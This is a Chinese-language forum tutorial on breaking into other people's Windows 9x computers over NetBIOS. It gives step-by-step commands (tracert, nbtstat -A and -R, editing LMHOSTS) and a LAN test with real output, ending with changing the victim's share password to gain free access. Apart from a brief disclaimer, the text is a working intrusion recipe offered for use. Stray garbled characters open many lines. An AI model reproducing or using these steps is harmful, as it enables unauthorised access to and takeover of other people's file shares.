WIN9X下的入侵方法

寒飞雪

下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。 2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。 以上方法请不要乱用，本人对你用上面的方法所惹出的麻烦概不负责，请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。
% x9 |! z' |$ B
: a! V6 _2 l( `7 X; b" t, h我这里是用局域网进行测试，所以没用上tracert。
& D" `0 h" L* l! F! A本机ＩＰ：192.168.1.12
# Q4 B+ i$ C2 F- ?. e/ l试验机： 192.168.1.5
# n( e+ }% q6 n3 s１。用nbtstat -a 192.168.1.5时有：
C:\WINDOWS>nbtstat -a 192.168.1.5
8 Y/ i( E2 r6 XNetBIOS Remote Machine Name Table
Name Type Status
" l. i0 U# c0 u---------------------------------------------
LYWS8 <00> UNIQUE Registered
LEDYOUNG <00> GROUP Registered
LYWS8 <03> UNIQUE Registered
2 k7 X( T! H! |( f/ @7 vLYWS8 <20> UNIQUE Registered
LEDYOUNG <1E> GROUP Registered
CY <03> UNIQUE Registered
MAC Address = 00-80-C8-E7-67-D3
% _0 P: \4 _/ r; ^% |3 b由此可知此机计算机名为LYWS8
  a6 r$ y$ K& q% r4 y) M( F& `２。将c:\windows\lmhosts.sam 改名为lmhosts.old，然后用copy命令建立lmhosts.sam：
ren lmhosts.sam lmhosts.old
copy con lmhosts.sam
( w# y2 z3 b9 F4 g6 d$ u8 mlmhosts.sam内容为：
! Y5 [  K3 n0 ]( r) ~192.168.1.5 LYWS8
2 V2 H+ C& v7 o! S8 }３。输入nbtstat -r时有：
/ v8 A) {3 w8 w3 Q: aC:\WINDOWS>nbtstat -r
; x) E; d4 G; F8 M0 ~NetBIOS Names Resolution and Registration Statistics
----------------------------------------------------
Resolved By Broadcast = 5
Resolved By Name Server = 0
Registered By Broadcast = 6
% P$ m& V& h! g: L  N! ~Registered By Name Server = 0
+ ]1 E  e7 l6 ~( T! hNetBIOS Names Resolved By Broadcast
6 E- r* \% M2 G6 P/ o- ?5 Z---------------------------------------------
4 l9 D5 q5 i% c7 fLEDYOUNG <1B>
LYWS8
4 X/ @' J6 a- e# x+ v# FLEDYOUNG <1B>
LYNTSRV
LEDYOUNG <1C>
- `$ V; r' Y! R! h* |４。点‘开始’－‘查找’－‘计算机’，输入　LYWS8
8 M5 A  L# ?% I( o/ C* M. \8 G５。在列表中双击此计算机，弹出一设置共享时的密码输入确认框（此机本来已设置成密码访问的共享形式），可以改共享密码和共享方式
$ i" |  ~  B! Y5 ~! }+ f６。改了共享密码和方式后当然可以自由进出了